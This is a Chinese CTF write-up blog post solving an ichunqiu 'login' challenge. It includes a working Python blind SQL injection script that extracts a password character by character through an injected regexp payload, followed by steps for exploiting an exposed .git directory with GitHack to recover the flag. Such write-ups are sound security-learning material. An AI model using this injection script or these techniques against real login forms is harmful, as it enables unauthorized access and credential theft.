登陆

作者: Yix1a | 来源:发表于2019-06-12 21:02 被阅读0次
    • 进入页面登陆
    • 输入东西都没有
    • 直接给burpsuite看看


      图片.png
    • 有个盲注,此处测试mid left都不行,只有regexp行
    • 用脚本进行盲注
    # py2.7
    import string
    import requests
    
    
    u =  'http://c6065149f0634125968c0ed3421e96e17e45f13aa4af4331.changame.ichunqiu.com/Challenges/login.php'
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    payloads = string.letters + string.digits
    
    temp = ''
    
    for i in xrange(32):
        for p in payloads:
            payload = temp + p
            data = "username=aa'or p3ss_w0rd regexp '^{}'%23&password=admin".format(payload)
            r = requests.post(u,headers=headers,data=data)
            if(len(r.text.encode('utf-8')) == 12):
                    temp += p
                    print temp.ljust(32,'.')
                    break
    
    • p3ss_w0rd是刚开始页面里面源码弄的,什么思路我也不懂。。
    • 得到账号是bctf3dm1n,密码是个md5,解密要收费,是adminqwe123666
    • 然后登陆进去后给出个目录列表
    • 仔细看那个名字.bctfg1t,应该是bctf的git。git泄露哦
    • 用githack,不是老版的githack,而是https://github.com/BugScanTeam/GitHack,能找到历史版本
    • 运行得到git目录。然后进去git cat-file -p HEAD(历史纪录),例如
      git cat -file - p a1/7d89c6219a1bcca6cb3b40526cc5b9da715a6e 去掉/号
    • 多试试可以得到一个php目录,然后访问得到flag。

    相关文章

      网友评论

          本文标题:登陆

          本文链接:https://www.haomeiwen.com/subject/hlyhfctx.html